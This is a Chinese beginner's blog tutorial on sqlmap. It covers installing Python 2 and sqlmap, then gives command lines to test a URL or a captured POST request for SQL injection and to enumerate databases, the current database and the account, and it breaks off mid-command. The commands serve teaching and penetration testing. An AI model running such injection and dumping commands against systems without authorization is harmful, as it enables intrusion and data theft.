sqlmap入门

sqlmap查找SQL注入漏洞入门
1、安装sqlmap
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。
它由python语言开发而成,因此运行需要安装python环境。它依赖于python 2.x ,请不要安装python 3.x
1.1 安装pyhon
在Windows上安装Python
首先,从Python的官方网站www.python.org下载最新的2.x版本,地址是这个:
https://www.python.org/downloads/
然后,运行下载的MSI安装包,在选择安装组件的一步时,勾上所有的组件:
特别要注意选上pip和Add python.exe to Path,然后一路点“Next”即可完成安装。
默认会安装到C:\Python27目录下
1.2 安装sqlmap
请在http://sqlmap.org/ 中下载sqlmap
将下载文件解压,然后将目录更改为SQLMap,将SQLMap复制到Python的安装目录C:\Python27,在cmd窗口中输入sqlmap.py -h,能看到帮助命令就表示安装成功了
我们将下载文件解压,然后将目录更改为SQLMap,将SQLMap复制到Python的安装目录C:\Python27,在cmd窗口中输入sqlmap.py -h,能看到帮助命令就表示安装成功了
2、检测注入
GET注入
sqlmap -u “http://www.vuln.cn/post.php?id=1″ 默认使用level1检测全部数据库类型
sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
-u:指定注入点url
post中注入
可以使用Fiddler工具来抓取post包,把请求保存在txt文件里
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数
-r REQUESTFILE 从一个文件中载入HTTP请求。
-p TESTPARAMETER 可注入的参数
3、暴库
3.1 曝出所有数据库名称,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u “http://www.vuln.cn/post.php?id=1” —dbs
参数:
–dbs:dbs前面有两条杠
3.2 当前使用的数据库
C:\Python27\sqlmap>python sqlmap.py -u “http://www.vuln.cn/post.php?id=1” —current-db
3.3 数据库使用账户
C:\Python27\sqlmap>python sqlmap.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值